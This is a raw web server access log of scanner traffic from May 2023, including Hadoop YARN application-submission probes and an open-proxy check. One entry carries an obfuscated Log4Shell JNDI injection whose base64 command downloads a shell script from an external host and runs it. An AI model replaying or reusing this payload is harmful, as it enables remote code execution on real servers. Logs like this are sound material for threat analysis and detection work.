78.128.114.14 - - [01/May/2023:02:28:54 +0800] "POST /ws/v1/cluster/apps/new-application HTTP/1.1" 404 232
185.233.19.121 - - [01/May/2023:02:38:12 +0800] "GET / HTTP/1.1" 200 397 "-" "-"
185.233.19.121 - - [01/May/2023:02:38:12 +0800] "GET / HTTP/1.1" 200 397
118.193.36.237 - - [01/May/2023:02:38:21 +0800] "GET / HTTP/1.1" 200 397 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36"
118.193.36.237 - - [01/May/2023:02:38:21 +0800] "GET / HTTP/1.1" 200 397
118.193.36.237 - - [01/May/2023:02:38:23 +0800] "GET /favicon.ico HTTP/1.1" 404 209
118.193.36.237 - - [01/May/2023:02:38:23 +0800] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36"
185.225.74.193 - - [01/May/2023:02:44:06 +0800] "GET / HTTP/1.0" 200 397 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
185.225.74.193 - - [01/May/2023:02:44:06 +0800] "GET / HTTP/1.0" 200 397
205.210.31.177 - - [01/May/2023:03:11:33 +0800] "GET / HTTP/1.0" 200 397
205.210.31.177 - - [01/May/2023:03:11:33 +0800] "GET / HTTP/1.0" 200 397 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
107.170.250.6 - - [01/May/2023:03:23:14 +0800] "MGLNDD_222.92.19.198_8088" 501 227
107.170.250.6 - - [01/May/2023:03:23:14 +0800] "MGLNDD_222.92.19.198_8088" 501 227 "-" "-"
43.158.218.124 - - [01/May/2023:03:41:53 +0800] "GET / HTTP/1.1" 200 397 "-" "'Mozilla/5.0"
43.158.218.124 - - [01/May/2023:03:41:53 +0800] "GET / HTTP/1.1" 200 397
78.128.114.14 - - [01/May/2023:03:55:54 +0800] "POST /ws/v1/cluster/apps/new-application HTTP/1.1" 404 232
78.128.114.14 - - [01/May/2023:03:55:54 +0800] "POST /ws/v1/cluster/apps/new-application HTTP/1.1" 404 232 "-" "python-requests/2.27.1"
66.249.69.74 - - [01/May/2023:04:40:43 +0800] "GET /robots.txt HTTP/1.1" 404 208
66.249.69.74 - - [01/May/2023:04:40:43 +0800] "GET /robots.txt HTTP/1.1" 404 208 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.69.74 - - [01/May/2023:04:40:44 +0800] "GET /eHR/ess/redirect.php?scriptname=findpasswd&action=findpasswd&lang=ZHS HTTP/1.1" 200 6836 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.142 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.69.74 - - [01/May/2023:04:40:44 +0800] "GET /eHR/ess/redirect.php?scriptname=findpasswd&action=findpasswd&lang=ZHS HTTP/1.1" 200 6836
78.128.114.14 - - [01/May/2023:05:30:50 +0800] "POST /ws/v1/cluster/apps/new-application HTTP/1.1" 404 232
78.128.114.14 - - [01/May/2023:05:30:50 +0800] "POST /ws/v1/cluster/apps/new-application HTTP/1.1" 404 232 "-" "python-requests/2.27.1"
8.222.203.92 - - [01/May/2023:06:31:39 +0800] "GET http://passport.baidu.com/ HTTP/1.1" 200 397 "-" "-"
8.222.203.92 - - [01/May/2023:06:31:39 +0800] "GET http://passport.baidu.com/ HTTP/1.1" 200 397
78.128.114.14 - - [01/May/2023:06:57:59 +0800] "POST /ws/v1/cluster/apps/new-application HTTP/1.1" 404 232 "-" "python-requests/2.27.1"
78.128.114.14 - - [01/May/2023:06:57:59 +0800] "POST /ws/v1/cluster/apps/new-application HTTP/1.1" 404 232
95.214.55.244 - - [01/May/2023:09:32:44 +0800] "GET / HTTP/1.1" 200 397 "t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//45.152.113.109:1389/TomcatBypass/Command/Base64/d2dldCBodHRwOi8vMTA3LjE3Mi4yMDYuMTE0Ly5kdWNrL3VwZGF0ZS5zaCA7IGN1cmwgLU8gaHR0cDovLzEwNy4xNzIuMjA2LjExNC8uZHVjay91cGRhdGUuc2ggOyBzaCB1cGRhdGUuc2g=}')" "t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//45.152.113.109:1389/TomcatBypass/Command/Base64/d2dldCBodHRwOi8vMTA3LjE3Mi4yMDYuMTE0Ly5kdWNrL3VwZGF0ZS5zaCA7IGN1cmwgLU8gaHR0cDovLzEwNy4xNzIuMjA2LjExNC8uZHVjay91cGRhdGUuc2ggOyBzaCB1cGRhdGUuc2g=}')"
95.214.55.244 - - [01/May/2023:09:32:44 +0800] "GET / HTTP/1.1" 200 397
111.7.96.149 - - [01/May/2023:10:04:05 +0800] "\x16\x03\x01" 501 205 "-" "-"
111.7.96.149 - - [01/May/2023:10:04:05 +0800] "\x16\x03\x01" 501 205
111.7.96.149 - - [01/May/2023:10:04:15 +0800] "GET / HTTP/1.1" 200 397 "-" "curl/7.64.1"
111.7.96.149 - - [01/May/2023:10:04:15 +0800] "GET / HTTP/1.1" 200 397
211.95.50.5 - - [01/May/2023:10:04:24 +0800] "GET / HTTP/1.1" 200 397
211.95.50.5 - - [01/May/2023:10:04:24 +0800] "GET / HTTP/1.1" 200 397 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36"
211.95.50.5 - - [01/May/2023:10:04:24 +0800] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36"
211.95.50.5 - - [01/May/2023:10:04:24 +0800] "GET /favicon.ico HTTP/1.1" 404 209
111.7.96.158 - - [01/May/2023:10:04:35 +0800] "GET / HTTP/1.1" 200 397 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36"
111.7.96.158 - - [01/May/2023:10:04:35 +0800] "GET / HTTP/1.1" 200 397
111.7.96.158 - - [01/May/2023:10:04:35 +0800] "GET /favicon.ico HTTP/1.1" 404 209
111.7.96.158 - - [01/May/2023:10:04:35 +0800] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36"
125.124.74.133 - - [01/May/2023:10:08:02 +0800] "GET / HTTP/1.1" 200 397 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36"
125.124.74.133 - - [01/May/2023:10:08:02 +0800] "GET / HTTP/1.1" 200 397
